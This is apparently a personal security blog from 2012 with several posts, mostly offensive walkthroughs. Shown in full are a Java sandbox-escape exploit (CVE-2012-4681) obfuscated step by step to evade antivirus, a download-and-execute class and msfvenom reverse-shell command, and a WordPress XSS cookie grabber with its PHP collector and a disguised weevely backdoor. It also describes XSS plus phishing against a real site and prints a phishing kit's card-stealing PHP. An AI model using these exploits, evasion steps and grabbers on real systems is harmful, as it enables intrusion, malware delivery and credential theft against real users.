Friday, December 7, 2012

Attacking Windows 8 with Java Exploit and Metasploit

In the last post i was talking about how to obfuscate a Java exploit (CVE-2012-4681 link here), now i want to show you how an attacker can use this obfuscated exploit for a targeted attack.

This is intended to be the second part of Wordpress Cookie Grabber video because i will show what you can do once you have compromised a website, frank's blog in this case. The victim will be only the administrator.

The exploit code in the previous article just escape from java sandbox and launch windows calculator. What we want to do is launch something different, like a meterpreter reverse shell which will connect back to the attacker. Thus in the previous code we have to add a download & execute class/method.

I opted for a new class but you can certainly add a method in the same class. This new class called NewClass (i'm lacking of fantasy) will download a meterpreter executable from a remote host and save it with the name fsc73B8.tmp.exe into temp folder, after that will be executed.

class NewClass
{
    // Directory 
    String t = "java", m = "io", p = "tmpdir", dot = ".";
    // Remote url
    String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
    
    public NewClass()
    {
        String l = System.getProperty( t+dot+m+dot+p ); // get temp folde path
        String r = r1+e+dot+m1+dot+o+t1+dot+e1;
        d( r, l);
    }
    
    private void d(String rPath, String lPath)
    {
        // File name
        lPath += "\\fsc73B8.tmp.";
        try
        {
            URL url = new URL(rPath);
            ReadableByteChannel rbc = Channels.newChannel(url.openStream());
            FileOutputStream fos = new FileOutputStream(lPath+"exe");
            fos.getChannel().transferFrom(rbc, 0, 1 << 24);
            fos.close();

            // execute
            Runtime.getRuntime().exec(lPath+"exe");
            
        } catch( Exception e ){}
    }
}

This two classes will be packed in one jar named java.jar;  now it will be detected by antivirus ?


Link here.

Ok, great it's not detected. In our scenario we have to infect only the administrator (Frank), if he has a vulnerable version of java. To check this we use PluginDetect a powerfull javascript script (used also by Blackhole till version 1.2.5) able to detect all plugins installed on browser.

The page that check this will look like this.

<script src="PluginDetect.js" type="text/javascript"></script>                                                                                                                                  
<script type="text/javascript">                                                                                                                                                                 
                                                                                                                                                                                                
        // detect java plugin                                                                                                                                                                   
        if( PluginDetect.isMinVersion("Java") >= 0 )                                                                                                                                            
        {                                                                                                                                                                                       
                // check version                                                                                                                                                                
                PluginDetect.getVersion(" ");                                                                                                                                                   
                var version = PluginDetect.getVersion("Java");                                                                                                                                  
                                                                                                                                                                                                
                // Affected versions                                                                                                                                                            
                // 170, 1701, 1702, 1703, 1704, 1705, 1706                                                                                                                                      
                version = version.replace(/\s/g, "");                                                                                                                                           
                                                                                                                                                                                                
                if( version.legth == 3 )                                                                                                                                                        
                        version = "1700";                                                                                                                                                       
                                                                                                                                                                                                
                // Convert to int so i can compare                                                                                                                                              
                var intVersion = parseInt(version);                                                                                                                                             
                                                                                                                                                                                                
                // if vulnerable                                                                                                                                                                
                if( intVersion >= 1700 && intVersion <= 1706 )                                                                                                                                  
                {                                                                                                                                                                               

                   document.write("&lt;applet code=\"Java.class\" archive=\"java.jar\"&gt;&lt;/applet&gt;");
                }

        } 
</script>


Now it's time to create a meterpreter tcp reverse shell that connect back to us.

sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe

As you can image this executable will be detected by most antivirus, even if we use encoders. The best solution would be to create your own crypter since all crypters that you would find online aren't  FUD, because they are public. I don't have time to create my own (and i don't know how to do it), but one day i will. In this page there are few crypters claiming to be Fully Undetectable, i chose 0vcrypter because can bypass Microsoft detection.


Frank lives in the United States and following this chart provided by opswat.com Microsoft Security Essential is the most widespread antivirus. With the default adoption by Windows 8 in the next months this percentage will increase even more.


After crypted our meterpreter shell and renamed java.exe we have all files that we need:
  • page.html (landing page)
  • PluginDetect.js
  • java.jar (exploit)
  • java.exe (meterpreter shell)
Now we can upload all these files to a remote host.

If you remember in the previous video we have left a weevely shell on his site so now we can connect to it and modify admin-header.php located into wp-admin folder.


Now start a meterpreter listener and if we were lucky that frank has a vulnerable version of java, our shell will be dropped correctly.


Once we have a meterpreter session we can do a lot of things but for now just took a screenshot of the desktop.


Enjoy the video.



Reference:

Thursday, November 15, 2012

Java Exploit Code Obfuscation and Antivirus Bypass/Evasion (CVE-2012-4681)

Why not play a game where we try to make the latest (at time of writing) public java exploit (CVE-2012-4681) undetected by all antivirus and see who will be the last to detect it ?. I think it will be a funny "challenge" because evading antivirus has always his charm.

I will not use software obfuscators like proGuard, Allatori, Zelix KlassMaster etc... This because will not be funny. This is not intended to be an analysis or explanation because there are already great post here:

Before we start we need to make two considerations:
  • From The Current Web-Delivered Java 0DaySo while you may see a few links to Virustotal with the inevitable complaining that a scanner is missing a specific chunk of altered code along with innaccurate claims that "AV is dead!" or "AV can't detect it", you should take them for the grain of salt that they are. The real story about client side mass exploitation is more complex than those claims.
  • The sequence of bypassed antivirus mainly depends on how i modify the exploit/flow.

Last Antivirus Standing

Who will be the last ? make your guess.

Let's start just copying the code from jduck poc taken from here: http://pastie.org/4594319. Upload compiled applet (.class file) to virustotal and we start with a detection of 23/43, first popular fall are from  Kaspersky, McAfee, Panda.


Virustotal link here.
Full image here.

One important thing are strings, as you can see there are few of them, for example (sun.awt.SunToolkit, file://, forName etc..). On step to bring down detection is to obfuscate these strings. For example
sun.awt.SunToolkit will become a char array. There are a lot of other ways to obfuscate a string  for example using StringBuilder, hex to ascii, decimal to ascii, string.replace and so on.

// setSecurityManager
String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
//sun.awt.SunToolkit
char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
// file
char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
// forName
String   ad = "or",me = "me", aw = "f", kl = "Na";
// getField
String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; 

Once done, compile and reupload it again.


Virustotal link here.
Full image here.
Code here.

As you can see just obfuscating a bunch of strings can decrease antivirus detection. Twelve antivirus are out of the game, most notable defeats are from Microsoft, Symantec, TrendMicro and DrWeb.

Now we can clean a bit the code because we don't need functions like paint. In addition we change applet name from Gondvv to Java, merge code from setField with diableSecurity and have a function named disableSecurity  is not a good thing. Now the code will look like this.

public class Java extends Applet
{
    // setSecurityManager
    setSecurityManagerString secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String   ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567"; 

    public void enableSecurity() throws Throwable
    {
        Statement localStatement = new Statement(System.class, secMan.replaceAll("\\d",""), new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL(new String(file)), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = Statement.class;
        arrayOfObject[1] = "a"+"c"+"c";
        Expression localExpression = new Expression(GetClass(new String(sun)), field.replaceAll("\\d",""), arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(localStatement, localAccessControlContext);
        
        localStatement.execute();
    }

    public void init()
    {
        try
        {
            enableSecurity();
            Runtime.getRuntime().exec("calc");
        }
        catch(Throwable t){}
    }
    
    private Class GetClass(String paramString) throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, aw+ad+kl+me, arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }    
}

Once again compile and reupload.



Virustotal link here.
Full image here.

Ratio is 9/44, Avast and MicroWorld-eScan fall under a simple function/class renaming. Now we modify a bit the flow and renaming all variables, for example localPermissions will be pe. Once again reupload to virustotal.

Damn detection ratio still 9/44 (same picture above). How we can drop detection ? simple, do the same thing but in another way. When i try to make an exploit to be undetected by antivirus i start testing line by line following the flow of the exploit and see which line trigger some antivirus. In this case from line 32 we start triggering F-Secure.




Another tip is to remove some variables and see if detection ratio change, in this case if we remove Statement.class and substitute it with null detection will go from 9/44 to 7/44.




Virustotal link here.

Thus, can i retrieve Statement class in another way ? For sure and we have this method under our nose because instead of using other ways like Class.forname("Statment") we can use GimmeClass.


Reupload .class file to virustotal and let's see if that works.


Virustotal link here.
Full image here.

Code here.

public class Java extends Applet
{
  // setSecurityManager
   String secMan = "22s234e34523454tS345e334545c345u5356r67i6t6y4354834M90a6n4a4g345e34r34";
    //sun.awt.SunToolkit
    char sun[] = {'s','u','n','.','a','w','t','.','S','u','n','T','o','o','l','k','i','t'};
    // file
    char file[] = {(char)102,(char)105,(char)108,(char)101,(char)58,(char)47,(char)47,(char)47};
    // forName
    String   ad = "or",me = "me", aw = "f", kl = "Na";
    // getField
    String field = "789g8795e456"+"5t5765F5675"+"567i6765e756"+"567l567d567";

public void enableSecurity() throws Throwable
{
   Object ao[] = new Object[2];
   ao[0] = GimmeClass("java.beans.Statement"); //Statement.class;
   ao[1] = "a"+"c"+"c";

   Expression e = new Expression(GimmeClass(new String(sun)), field.replaceAll("\\d",""), ao);
   e.execute();
   Field field = (Field)e.getValue();


   Permissions pe = new Permissions();
   pe.add(new AllPermission());

   CodeSource cs = new CodeSource(new URL(new String(file)), new Certificate[0]);
   ProtectionDomain pd = new ProtectionDomain(cs, pe);

   AccessControlContext ac = new AccessControlContext(new ProtectionDomain[] { pd });

   Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
   field.set(stat, ac);
   stat.execute();
}

public void init()
{
   try
   {
      enableSecurity();
      Runtime.getRuntime().exec("calc");
   }
    catch(Throwable t){}
}

  private Class GimmeClass(String ps) throws Throwable
  {
     Expression le = new Expression(Class.class, aw+ad+kl+me, new Object[] {ps});
     le.execute();
      return (Class)le.getValue();
  }    
}
Now detection ration is 7/44 and AVG and ESET are gone.

Again we remove some part of the code to see where detection will change. If we delete last three lines of code detection will be 0/44. But these lines instantiate a class and call a method, how we can do this in another way ? Simple, we use reflection.

From Stackoverflow:
The name reflection is used to describe code which is able to inspect other code in the same system (or itself).
For example, say you have an object of an unknown type in Java, and you would like to call a 'doSomething' method on it if one exists. Java's static typing system isn't really designed to support this unless the object conforms to a known interface, but using reflection, your code can look at the object and find out if it has a method called 'doSomething', and then, call it if you want to.
Using java documentation from here and there, we instantiate a class and call two methods with reflection.

Before:
Statement stat = new Statement( System.class,secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
stat.execute();

After:
Class statClass = GimmeClass("java.beans.Statement");
Constructor con = statClass.getConstructor(new Class[]{ Object.class, String.class, Object[].class});
Object stat = con.newInstance(GimmeClass("java.lang.System"),secMan.replaceAll("\\d",""), new Object[1]);
field.set(stat, ac);
Method m = stat.getClass().getMethod("execute");
m.invoke(stat);

First we check if the exploit works, to see if we messed up something, but no it works. Ok, now upload to virustotal and should be a nice 0/44 detection..



Virustotal link here.
Full image here.
Code here.

Damn we were so close. One antivirus detect our exploit. Guess who is back ?


Since it is the last to detect our exploit Microsoft Security Essentials is the winner of this small competition. This post can't end here because we want to made our exploit fully undetectable. Take a look at these two lines below.

Permissions pe = new Permissions();
pe.add(new AllPermission());

Why not use reflection. Then become:

Class alPerm = Class.forName("java.security.AllPermission");
Class perm   = GimmeClass("java.security.Permissions");
Object pe= perm.newInstance();
Method method = pe.getClass().getMethod("add", GimmeClass("java.security.Permission"));
method.invoke(pe, alPerm.newInstance());

Once uploaded to virustotal detection ratio is ...



Virustotal Link here.
Full image here.
Code here.

Great! If we create a jar file it will be detected ?


Virustotal link here.

As class file it is not detected.

Now we can test it on a windows machine with security essentials installed to see if really works. To do this test i used Windows 8 which has windows defender (security essentilas) installed by default.


It works!. I now this can't proof anything (it's just a picture) but soon i will post a video about this. You can find the video here.

Hope you enjoyed.

Step by step java exploit code: 1/5, 2/5, 3/5, 4/5, 5/5.

References.
- Creating new class instances
- Invoking methods
What are all the different ways to create an object in Java?
How do I invoke a java method when given the method name as a string?

Friday, November 2, 2012

Wordpress Cookie Grabber

In a previous video Wordpress XSS + Internet Explorer 8 Exploit i showed you how you can use a Cross-site scripting vulnerability to redirect a victim with Internet Explorer to a malicious site containing an exploit for version 8. Another way, is to use it as cookie grabber.

From wikipedia:
A cookie, also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored in a user's web browser while a user is browsing a website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify the website of the user's previous activity.
Basically, when a user visit the "infected" page all cookies of that domain will be sent to a script which will store informations in a file/db or sent via email to the attacker.

After selecting our wordpress target (franksite.dot/wordpress) we use a vulnerability scanner called wpscan developed by ethicalhack3r that is able to gather useful information such as:
  • wordpress version
  • wordpress vulnerabilities (link to exploit-db)
  • all installed plugins
  • plugins vulnerabilities (link to exploit-db)


As we can see, there is a plugin installed called Count per Day which seems to be vulnerable. Results on exploit-db lead to two vulnerabilities for two different versions, therefore first we have to check which version is installed. As many plugins do, inside their folder there is a file with current version, changelog etc.. This plugin isn't different so since its folder is publicly accessible, you can see all files.


After opening readme.txt and see that the current version is 3.2.3 we can focus on the previous exploit found in exploit-db. This version is vulnerable to a stored XSS.

How this vulnerability works. As you can see from the picture below there is a file notes.php which allow everyone to add some notes.


This note can be plain text or html.


This code is viewed in count-per day dashboard and the developer didn't validate the input, but the main problem of this page is that shouldn't be accessible to everyone.


This is a perfect scenario where we can use a cookie grabber, because the code is exeuted only in administrator panel.

How can we get admin cookie ? 

We need two things:
  1. Javascript code that get cookie through document.cookie and send it
  2. A script (php, python, ruby ..) on another server that receive the information and stores it (file, mysql, send email...).
A lot of online examples use a redirection method to get the cookie, like this one:
document.location = "http://scriptlocation.dot/script?c=" + document.cookie 
In this case, this is not acceptable because we want to do it in a stealthiest way. What we have to do is a GET request to a script, so how we can do it in javascript without redirection ?
A clever way is to use the Image object and its src property. Once done the code will look like this:

If we add this code as note, nothing will happen because Count per Day perform a quotes escape.


Since only quotes are escaped we can bypass this filter in two ways:
  1. Convert url in unicode characters 
  2. Use alphanumeric javascript   
Let's try both ways. In the first way we need an ASCII to Unicode convert, i found this site string-fromcharcode-encoder. After conversion our code will look like this:

new Image().src = String.fromCharCode(104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,50,46,51,47,102,111,108,100,101,114,47,103,114,97,98,98,101,114,46,112,104,112,63,99,61) + document.cookie;

Now the code will be executed, because there aren't quotes. A negative thing about this is if the administrator check the source code of the page, he will see the string document.cookie and maybe he will suspect something.

In the second way we transform javascript code into an equivalent sequence of () [] {} ! + characters. A guy named Patricio Palladino made it possible creating a tool availabe here. Now our cookie grabber will look like this:
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]](([]
-- snip --
Following this way, we obfuscate all the code, but the length is a disadvantage  for a stealthier code. As last thing we need to use javascript escape function, otherwise some cookie characters will be altered, for example instead of % we get |.
new Image().src="http://192.168.2.3/folder/grabber.php?c=" + escape(document.cookie);

Till now we have explained how to get the cookie, now let's start talk about how to store our information. This task is very simple because with few lines of php we can store all incoming cookies in a text file.

Script code:

$file_name      = "cookie.txt";
        $suicide_key    = "password";


        if( isset($_GET['c']) )
        {
                $content = $_GET['c'];
                $content = str_replace(" ", "", $content);
                $lines = explode(";",$content);

                $handle = fopen($file_name,'a');

                fwrite($handle, "----- START\n\n");

                foreach( $lines as $line )
                        fwrite($handle,$line."\n");


                fwrite($handle,"\n----- END\n");
                fclose($handle);

        } 
        else if( isset($_GET['s']) )
        {
                if( strcmp( trim($_GET['s']), $suicide_key ) == 0)
                {
                        unlink($file_name);
                        unlink(__FILE__);
                }
        } 
This code is simple and doesn't need explanations, the only thing is that i also provided a suicide mode in case the attacker wants to delete both files.Once we got the administrator cookie we use Cookies Manager+ a plugin for Firefox that is able to add/remove cookies.



After adding our cookie reload the page and voilĂ ; administrator privileges acquired. Since cookie can change or Count per Day can be removed or updated we need to find a way to create a backdoor (stay persistent). It's here that weevely comes in handy:
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
Hopefully franksite.dot has installed a plugin to manage files, so as administrators we can upload weevely and connect to it.


To be more stealthier we upload again weevely, but this time in another folder (wp-admin) and with a name that it looks like a legit wordpress file.


That's all for now. Enjoy the video.



References:
- Sample penetration test report
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
Javascript alphanumeric obfuscator

Tuesday, October 2, 2012

Google winning award email scam

Just a quick post, because i've never seen this type of scam (using google as vector), but i think it's an old technique.


I have won a cash price from google, but why gmail moved the email to spam section ? :(

Attached pdf.


Graphics seems to be created with paint, because is horrible. If they have to convince people to send their credentials, at least make a better template.

Wednesday, May 30, 2012

From XSS to NT AUTHORITY

A lot of times i have seen Cross-site scripting vulnerabilities classified as low impact or not significant. Thus, this time i want to show you how an attacker can get administration privileges through a simple XSS.

A couple of months ago i discovered an XSS vulnerability affecting the uk website of Orange http://www.orange.co.uk. I've emailed them a month ago (and two weeks ago) regarding this vulnerability, but i haven't received any response yet.

From wikipedia:
Orange is the flagship brand of the France Telecom group for mobile, landline and Internet businesses, with 226 million customers as of December 2011 and, under the brand Orange Business Services, is one of the world.
How i found this XSS ?

When you read an article, for example this one obesity_levels_could_be_cut_with_20_fat_tax, you can see  the users comments at the bottom of the page. If a user want to leave a comment, he must log in via google, facebook etc.... Once logged, the website create a profile with all your statictis (recent comments) and personal information (age, gender, joined).


If you click on the name of a user you will be redirected to his profile page like this below.


If you take a look at the url you will see that it has three parameters:
  1. UID
  2. plckUserId
  3. plckPersonaPage
Let's start testing the first parameter. We type some special characters that are used to find potential XSS vulnerabilities like )("><'/&\.

hxxp://web.orange.co.uk/r/community/persona?UID=)("><'/&\

Surprisingly we get this


Oh... we are lucky; at the first attempt we have obtained something interesting. Let's try with a bit of html code.


As expected the page didn't sanitize the output interpreting the html code. Using firebug we can see in which part of the page is located the faulty parameter.


Now we sobstitute the h1 tag with a script tag (<script>alert(0)</script>) and we should get an alert box.


Is not so, let's take a look at the source code.



Seems there is an XSS filters with some blacklist tags. There are tons of others ways to trigger an XSS without a script tag, one of them is using the img tag.

<img/src="1"/onerror="alert(1)"


Since 1 isn't a valid image the onerror event is triggered and his content executed. Now all we have to do is sobstitute the alert instruction with some useful code.

In our case we want to redirect the victim to a cloned page containing a malicious java applet, so the code will be:



How can we trick the victim to click our malicious link ?

Simple, we can send him an email regarding some promotions that orange actually do and telling to click on the image.



But here we have a little problem.

When you place the mouse over the image in most of the browsers at the bottom will appear the link pointed by the image. Some users can be suspicious viewing a link like this hxxp://web.orange.co.uk/r/community/persona?UID="><img/src="1"/onerror="window.location='...'", so disguise the url is a necessary step.

To accomplish this task we do two things:

  1. Add unexisting url parameters ( page=1&category=2&ticket=24234&session_id=888 )
  2. XSS character encoding ( UID="><img ... to %55%49%44=%22%3E%3C%69%6D%67.... )

And the result is this.


To compromise victim's machine we use a great feature from SET called Java Applet Attack Vector.

From http://www.social-engineer.org:
The Java Applet is one of the core attack vectors within SET and the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable.
I've cloned this page hxxp://web.orange.co.uk/p/film/cinema_tickets and sent the email with a address that a lot of companies uses when they send promotions and things like that (donotreply@...).

That's all, enjoy the video.

Monday, April 23, 2012

CartaSi phishing email part 2/2

Behind this phishing emails there are several people or just one guy ?

What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.


Where is he from ?

His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.

I was wrong in the previous article saying that the pisher hacked the webstie because was defaced by FERID23 from anti-armenia.org. I suppose that at the end of September 2011 this phisher found it, uploaded a shell and created several folders in this order:
  1. d3b (postepay information stealer)
  2. stf   (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
  3. pastote (cartasi, paypal, VISA, bancopostaclick)

Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.


The emails address are stored in 30 rar files named pastoteXX.


From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.

When a victim click on the link will be redirected to this fake page on this site.


Once logged in



Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.

$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$data = date("l, F d, Y h:i" ,time());
$agent = $_SERVER['HTTP_USER_AGENT'];
$nome = $_POST['nome'];
$cognome = $_POST['cognome'];
$c_tip = $_POST['credit_card_type'];
$cn = $_POST['cc_number'];
$an = $_POST['expdate_year'];
$luna = $_POST['expdate_month'];
$cvv = $_POST['cvv'];
$dob_ziua = $_POST['dob_ziua'];
$dob_luna = $_POST['dob_luna'];
$dob_an = $_POST['dob_an'];

$address1 = $_POST['adresa'];
$zip = $_POST['cod_postal'];
$city = $_POST['oras'];
$state = $_POST['provincie'];

//---Email---//
$email = "--snip--@fastwebmail.it";
$subiect = "$ip:$username:$password";
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

$mesaj_html ="





Indirizzo email $username
Password PayPal $password

Nome $nome
Gnome $cognome
Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)

Indirizzo $address1
CAP $zip
CittĂ  $city
Provincia $state

Tipo di carta di credito $c_tip
Numero della carta di credito $cn
Data di scadenza $luna/$an
Codice di sicurezza della carta $cvv

IP $ip
Data $data
Browser $agent
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");

He did a good job to replicate paypal login process.

In the stf folder all stolen data are sent to fanemacaz@gmail.com and the techniques used to trick users are the same explained previously.

Folder index file.


Folder content.


That's all for now.